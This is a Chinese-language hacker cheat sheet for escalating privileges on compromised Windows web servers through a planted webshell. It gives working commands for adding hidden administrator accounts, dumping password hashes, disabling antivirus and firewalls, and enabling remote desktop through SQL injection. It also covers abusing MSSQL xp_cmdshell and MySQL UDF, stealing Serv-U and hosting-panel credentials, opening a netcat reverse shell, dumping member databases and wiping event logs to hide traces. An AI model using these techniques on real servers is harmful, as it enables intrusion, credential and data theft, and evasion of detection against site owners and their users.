提權技巧
1.cmd拒絕訪問就自己上傳一個cmd.exe,自己上傳的cmd是不限制后綴的,還可以是cmd.com cmd.txt cmd.rar等
2.net user不能執行有時候是net.exe被刪除了,可以先試試net1,不行就自己上傳一個net.exe
3.cmd執行exp沒回顯的解決方法:com路徑那里輸入exp路徑C:\RECYCLER\pr.exe,命令那里清空(包括/c )輸入net user jianmei daxia /add
4.有時候因為監控而添加用戶失敗,試試上傳抓取hash的工具,如PwDump7.exe,得到hash之后可以進行破解,建議重定向結果到保存為1.txt
cmd /c c:\windows\temp\cookies\PwDump7.exe >1.txt,在條件允許的情況下也可以用mimikatz直接抓明文
5.有時候權限很松,很多命令都可以執行,但是就是增加不上用戶,這時候你就要考慮是不是因為密碼過於簡單或是過於復雜了
6.用wt.asp掃出來的目錄,其中紅色的文件可以替換成exp,執行命令時cmd那里輸入替換的文件路徑,下面清空雙引號加增加用戶的命令
7.有時候可以添加用戶,但是添加不到管理組,有可能是administrators組改名了,使用命令net user administrator查看管理組的名字
8.有的cmd執行很變態,asp馬里,cmd路徑填上面,下面填:"c:xxxexp.exe whoami” 記得前面加兩個雙引號,不行后面也兩個,不行就把exp的路徑放在cmd那里,下面不變
9.當添加不上用戶卻可以添加“增加用戶的Vbs、bat)的時候,就添加一個吧,然后用“直接使服務器藍屏重啟的東東”讓服務器重啟就提權成功
10.菜刀執行的技巧,上傳cmd到可執行目錄,右擊cmd 虛擬終端,help 然后setp c:windowstempcmd.exe 設置終端路徑為:c:\windows\temp\cmd.exe
11.支持aspx但跨不了目錄的時候,可以上傳一個讀iis的vbs,執行命令列出所有網站目錄,找到主站的目錄就可以跨過去了,上傳cscript.exe到可執行目錄,
接着上傳iispwd.vbs到網站根目錄,cmd命令cmd /c “c:\windows\temp\cookies\cscript.exe” d:\web\iispwd.vbs
11.如何辨別服務器是不是內網?192.168.x.x 172.16.x.x 10.x.x.x
12.安全狗下加用戶的語句::for /l %i in (1,1,1000) do @net user test test [/add&@net]() localgroup administrators test /add
13.21對應的FTP、1433對應的MSSQL、3306對應的MYSQL、3389對應的遠程桌面、1521對應的Oracle、5631對應的pcanywhere
14.劫持提權,說到這個,想必肯定會想到lpk.dll這類工具,有時候在蛋疼怎么都加不上賬戶的時候,可以試試劫持shift、添加開機啟動等等思路
15.提權成功但3389端口沒開,執行語句或是工具開3389失敗的時候,可以上傳rootkit.asp,登陸進去就是system權限,這時候再嘗試開3389希望較大
常用DOS命令
查看版本:ver
查看權限:whoami
查看配置:systeminfo
查看用戶:net user
查看進程:tasklist
查看正在運行的服務:tasklist /svc
查看開放的所有端口:netstat -ano
查詢管理用戶名:query user
查看搭建環境:ftp 127.0.0.1
查看指定服務的路徑:sc qc Mysql
添加一個用戶:net user jianmei daxia.asd /add
提升到管理權限:net localgroup administrators jianmei /add
添加用戶並提升權限:net user jianmei daxia.asd /add & net localgroup administrators jianmei /add
查看制定用戶信息:net user jianmei
查看所有管理權限的用戶:net localgroup administrators
加入遠程桌面用戶組:net localgroup “Remote Desktop Users” jianmei /add
突破最大連接數:mstsc /admin /v:127.0.0.1
刪除用戶:net user jianmei /del
刪除管理員賬戶:net user administrator daxia.asd
更改系統登陸密碼:net password daxia.asd
激活GUEST用戶:net user guest /active:yes
開啟TELNET服務:net start telnet
關閉麥咖啡:net stop “McAfee McShield”
關閉防火牆:net stop sharedaccess
查看當前目錄的所有文件:dir c:\windows\
查看制定文件的內容:type c:\windows\1.asp
把cmd.exe復制到c:windows的temp目錄下並命名為cmd.txt:copy c:\windows\temp\cookies\cmd.exe c:\windows\temp\cmd.txt
開3389端口的命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
查看補丁:dir c:\windows\>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type [a.txt|@find](mailto:a.txt%7C@find) /i [“%i”||@echo](mailto:%E2%80%9C%i%E2%80%9D%7C%7C@echo)%i Not Installed!)&del /f /q /a a.txt
常見殺軟
360tray.exe 360實時保護
ZhuDongFangYu.exe 360主動防御
KSafeTray.exe 金山衛士
McAfee McShield.exe 麥咖啡
SafeDogUpdateCenter.exe 服務器安全狗
windows提權中敏感目錄和敏感注冊表的利用
提權中的敏感注冊表位置
SQL語句直接開啟3389
3389登陸關鍵注冊表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections
其中鍵值DenyTSConnections 直接控制着3389的開啟和關閉,當該鍵值為0表示3389開啟,1則表示關閉。
而MSSQL的xp_regwrite的存儲過程可以對注冊進行修改,我們使用這點就可以簡單的修改DenyTSConnections鍵值,從而控制3389的關閉和開啟。
開啟3389的SQL語句: syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\TerminalServer’,'fDenyTSConnections’,'REG_DWORD’,0;–
關閉3389的SQL語句:syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\TerminalServer’,'fDenyTSConnections’,'REG_DWORD’,1;–
2003可以實現一句話開3389:reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v PortNumber /t REG_DWORD /d 80 /f
wscript.shell的刪除和恢復
卸載wscript.shell對象,在cmd下或直接運行:regsvr32 /u %windir%\system32\WSHom.Ocx
卸載FSO對象,在cmd下或直接運行:regsvr32.exe /u %windir%\system32\scrrun.dll
卸載stream對象,在cmd下或直接運行:regsvr32 /s /u “C:\ProgramFiles\CommonFiles\System\ado\msado15.dll” 如果想恢復的話只需要去掉/U 即可重新再注冊以上相關ASP組件,這樣子就可以用了
如何找到准確的終端連接端口?
在aspx大馬里,點擊“系統信息”第三個就是目前的3389端口
或是執行命令查看正在運行的服務:tasklist /svc
找到:svchost.exe 1688 TermService
記住1688這個ID值,查看開放的所有端口:netstat -ano
找到1688這個ID值所對應的端口就是3389目前的端口
iis6提權提示Can not find wmiprvse.exe的突破方法
突破方法一:
在IIS環境下,如果權限做得不嚴格,我們在aspx大馬里面是有權限直接結束wmiprvse.exe進程的,進程查看里面直接K掉
在結束之后,它會再次運行,這時候的PID值的不一樣的,這時候我們回來去運行exp,直接秒殺。
突破方法二:
虛擬主機,一般權限嚴格限制的,是沒權限結束的,這時候我們可以考慮配合其他溢出工具讓服務器強制重啟,比如“直接使服務器藍屏重啟的東東”
甚至可以暴力點,DDOS秒殺之,管理發現服務器不通了首先肯定是以為服務器死機,等他重啟下服務器(哪怕是IIS重啟下)同樣秒殺之。
本地溢出提權
計算機有個地方叫緩存區,程序的緩存區長度是被事先設定好的,如果用戶輸入的數據超過了這個緩存區的長度,那么這個程序就會溢出了.
緩存區溢出漏洞主要是由於許多軟件沒有對緩存區檢查而造成的.
利用一些現成的造成溢出漏洞的exploit通過運行,把用戶從users組或其它系統用戶中提升到administrators組.
想要執行cmd命令,就要wscript.shell組建支持,或是支持aspx腳本也行,因為aspx腳本能調用.net組件來執行cmd的命令.
Mssql提權
掃描開放的端口,1433開了就可以找sa密碼提權,用大馬里的搜索文件功能,sa密碼一般在conn.asp config.asp web.config 這三個文件
也可以通過注冊表找配置文件,看下支持aspx不,支持的話跨目錄到別的站點上找,找到之后用aspshell自帶的sql提權登錄再執行命令創建用戶即可。
aspx馬提權執行命令有點不一樣,點擊數據庫管理–選MSSQL–server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB–輸入帳號密碼連接即可
增加一個用戶:exec master.dbo.xp_cmdshell ‘net user jianmei daxia.asd /add’;–
提升為管理員:exec master.dbo.xp_cmdshell ‘net localgroup administrators jianmei /add’;–
PS:如果增加不上,說明是xp_cmdshell組建沒有,
增加xp_cmdshell組建命令:Use master dbcc addextendedproc(‘xp_cmdshell’,'xplog70.dll’)
1433一句話開3389: Exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server’,'fDenyTSConnections’,'REG_DWORD’,0;–
mysql提權
利用mysql提權的前提就是,服務器安裝了mysql,mysql的服務沒有降權,是默認安裝以系統權限繼承的(system權限).並且獲得了root的賬號密碼
如何判斷一台windows服務器上的mysql有沒有降權? cmd命令net user 如果存在 mysql mssql這樣用戶或者類似的.通常就是它的mssql mysql服務已經被降權運行了
如何判斷服務器上是否開啟了mysql服務? 開了3306端口,有的管理員會把默認端口改掉.另一個判斷方法就是網站是否支持php,一般支持的話都是用mysql數據庫的.
如何查看root密碼? 在mysql的安裝目錄下找到user.myd這個文件,連接信息就在里面,一般是40位cmd加密,一些php網站安裝的時候用的是root用戶,在conn.asp config.asp這
些文件里,可以用PHP腳本的文件搜索功能搜索這兩個文件,找到之后編輯就可以找到連接信息,有時會顯得很亂,這時就需要自己去組合,前17位在第一行可以
找到,還有23位在第三行或是其他行,自己繼續找。
可以直接用php腳本里“mysql執行”,或是上傳個UDF.php,如果網站不支持PHP,可以去旁一個php的站,也可以把UDF.php上傳到別的phpshell上也可以。
填入帳號密碼之后,自然就是安裝DLL了,點擊“自動安裝Mysql BackDoor” 顯示導出跟創建函數成功后,緊接着執行增加用戶的命令即可。
PS:5.0版本以下(包括5.0的)默認c:windows系統目錄就可以了,5.1版本以上的不能導出到系統目錄下創建自定義函數,只能導出在mysql安裝目錄下的
lib/plugin目錄中,例如:D:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/mysql.dll
serv-u提權
這個文件里包含serv-u的md5密碼:C:\Program Files\RhinoSoft.com\Serv-U\\ServUDaemon.ini
找到這個文件:ServUDaemon.ini 打開找到:LocalSetupPassword=nqFCE64E0056362E8FCAF813094EC39BC2
再拿md5密文去解密,再用現在的密碼登陸提權即可。
serv-u提權的前提是43958端口開了,且知道帳號密碼!
如果帳號密碼默認,直接用shell里面的serv-u提權功能即可搞定,建議用aspx馬、php馬去提權,因為可以看回顯。
530說明密碼不是默認的,回顯330說明成功,900說明密碼是默認的
在程序里找個快捷方式,或是相關的文件進行下載到本地,再查看文件的屬性,就可以找到serv-u的安裝目錄了。
端口轉發
什么情況下適合轉發端口?
1.服務器是內網,我們無法連接。
2.服務器上有防火牆,阻斷我們的連接。
轉發端口的前提,我們是外網或是有外網服務器。
找個可讀可寫目錄上傳lcx.exe
本地cmd命令:lcx.exe -listen 1988 4567 (監聽本地1988端口並轉發到4567端口)
接着shell命令:cmd /c c:\windows\temp\cookies\lcx.exe -slave 本機ip 1988 服務器ip 3389 (把服務器3389端口轉發到本地4567端口)
之后本地連接:127.0.0.1:4567 (如果不想加上:4567的話,本地執行命令的時候,把4567換成3389來執行就行了)
以上是本機外網情況下操作,接着說下在外網服務器里如何操作:
上傳lxc.exe cmd.exe到服務器且同一目錄,執行cmd.exe命令:lcx.exe -listen 1988 4567
接着在aspx shell里點擊端口映射,遠程ip改為站點的ip,遠端口程填1988,點擊映射端口,接着在服務器里連接127.0.0.1:4567就可以了。
NC反彈提權
當可以執行net user,但是不能建立用戶時,就可以用NC反彈提權試下,特別是內網服務器,最好用NC反彈提權。
不過這種方法, 只要對方裝了防火牆, 或是屏蔽掉了除常用的那幾個端口外的所有端口,那么這種方法也失效了….
找個可讀可寫目錄上傳nc.exe cmd.exe
-l 監聽本地入棧信息
-p port打開本地端口
-t 以telnet形式應答入棧請求
-e 程序重定向
本地cmd執行:nc -vv -l -p 52進行反彈
接着在shell里執行命令:c:\windows\temp\nc.exe -vv 服務器ip 999 -e c:\windows\temp\cmd.exe最好是80或8080這樣的端口,被防火牆攔截的幾率小很多
執行成功后本地cmd命令:cd/ (只是習慣而已)
接着以telnet命令連接服務器:telnet 服務器ip 999
回車出現已選定服務器的ip就說明成功了,接着權限比較大了,嘗試建立用戶!
PS:一般這樣的格式執行成功率很小,不如直接在cmd那里輸入:c:\windows\temp\nc.exe 命令這里輸入:-vv 服務器ip 999 -e c:\windows\temp\cmd.exe
這個技巧成功率比上面那個大多了,不單單是nc可以這樣,pr這些提權exp也是可以的
星外提權
如何知道是不是星外主機?
第一:網站物理路徑存在“freehost”
第二:asp馬里點擊程序,存在“7i24虛擬主機管理平台”“星外主機”之類的文件夾
默認帳號:freehostrunat 默認密碼:fa41328538d7be36e83ae91a78a1b16f!7
freehostrunat這個用戶是安裝星外時自動建立的,已屬於administrators管理組,而且密碼不需要解密,直接登錄服務器即可
(ee.exe提權法)
找個可讀可寫目錄上傳ee.exe
cmd命令:/c c:\windows\temp\cookies\ee.exe -i(獲取星外帳號的id值,例如回顯:FreeHost ID:724)
接着命令:/c c:\windows\temp\cookies\ee.exe -u 724 (獲取星外的帳號密碼)
(vbs提權法)
找個可讀可寫目錄上傳cscript.exe和iispwd.vbs
cmd執行:/c “c:\windows\temp\cookies\cscript.exe” c:\windows\temp\cookies\iispwd.vbs
意思是讀取iis,這樣一來,不但可以獲取星外的帳號密碼,還可以看到同服務器上的所有站點的目錄
360提權
找個可讀可寫目錄上傳360.exe
cmd命令:/c c:\windows\temp\cookies\360.exe
會提示3段英文: 360 Antivirus Privilege Escalation Exploit By friddy 2010.2.2 You will get a Shift5 door! Shift5 Backdoor created! 這是成功的征兆,接着連接服務器連按5下shift鍵,將彈出任務管理器,點擊新建任務:explorer.exe 會出現桌面,接下來大家都會弄了……
華眾虛擬主機提權
就經驗來說,一般溢出提權對虛擬主機是無果的,而且華眾又沒有星外那么明顯的漏洞
所以華眾提權關鍵之處就是搜集信息,主要注冊表位置:
HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\ HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass root密碼
HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mssqlpss sa 密碼
c:\windows\temp 下有hzhost主機留下的ftp登陸記錄有用戶名和密碼
以上信息配合hzhosts華眾虛擬主機系統6.x 破解數據庫密碼工具使用
百度搜索:hzhosts華眾虛擬主機系統6.x 破解數據庫密碼工具
脫庫
Access數據庫脫庫很簡單,直接下載數據庫即可,mssql數據庫可以用shell自帶的脫褲功能,找到數據庫的連接信息,一般在web.config.asp里,然后連接一
下SA,找到會員表(UserInfo)就可以了。
mysql數據庫脫庫,找到root帳號密碼,用PHP大馬自己帶鏈接功能連接一下,也自己自己上傳PHP脫褲腳本,之后找到目標數據庫(數據庫名),再找到會員表
menber進行脫褲即可。
服務器安全
命令提示符已被系統管理員停用? 解決方法:運行→gpedit.msc→用戶配置→管理模板→系統,在右側找到”阻止命令提示符”, 然后雙擊一下,在”設置”里面選中”未配置” ,最后點擊”確定”。
如何判斷服務器的類型? 解決方法:直接ping服務器ip,看回顯信息進行判斷
TTL=32 9X/ME
TTL=64 linux
TTL=128 2000X/XP
TTL=255 UNIX
為什么有時3389開放卻不能連接? 原因分析:有時候是因為防火牆,把3389轉發到其他端口就可以連接了,有的轉發后依然是連接不上,那是因為管理員在TCP/IP里設置的端口限制 解決方法:我們需要把端口轉為TCP/IP里設置的只允許連接的端口其中一個就可以了,更好的辦法是取消端口限制。
最簡單的往服務器上傳東西方法是什么? 本機打開“HFS網絡文件服務器”這款工具,把需要上傳的工具直接拖進左邊第一個框內,復制上面的地址,到服務器里的瀏覽器訪問,就可以下載了
限制“命令提示符”的運行權限? 我的電腦(右鍵)–資源管理器中–點擊“工具”按鈕,選擇“文件夾選項”,切換到“查看”標簽,去掉“使用簡單文件共享(推薦)”前面的鈎,這一步是為
了讓文件的屬性菜單中顯示“安全”標簽,然后進入“c:\windows\system32\”,找到“cmd.exe”,點右鍵選擇“屬性”,切換到“安全”標簽,將其中“組
或用戶名稱”中除了管理員外的所有用戶都刪除,完成后點“確定”這樣當普通用戶想運行“命令提示符”的時候將會出現“拒絕訪問”的警告框。
如何更改windows2003最大連接數? windows2003中的遠程桌面功能非常方便,但是初始設置只允許2個用戶同時登陸,有些時候因為我在公司連接登陸后斷開,同事在家里用其他用戶登陸后斷開,
當我再進行連接的時候,總是報錯“終端服務超過最大連接數”這時候我和同事都不能登陸,通過以下方法來增加連接數,運行:services.msc,啟用license
logging,別忘了添加完畢后再關閉 License Logging 打開win2k3的控制面板中的“授權”,點“添加許可”輸入要改的連接數
如何清除服務器里的IP記錄日志?
1.我的電腦右鍵管理–事件查看器–安全性–右鍵清除所有事件
2.打開我的電腦–C盤–WINDOWS–system32–config–AppEvent.Evt屬性–安全–全部都拒絕
3.Klaklog.evt屬性–安全–全部都拒絕–SecEvent.Tvt屬性–安全–全部都拒絕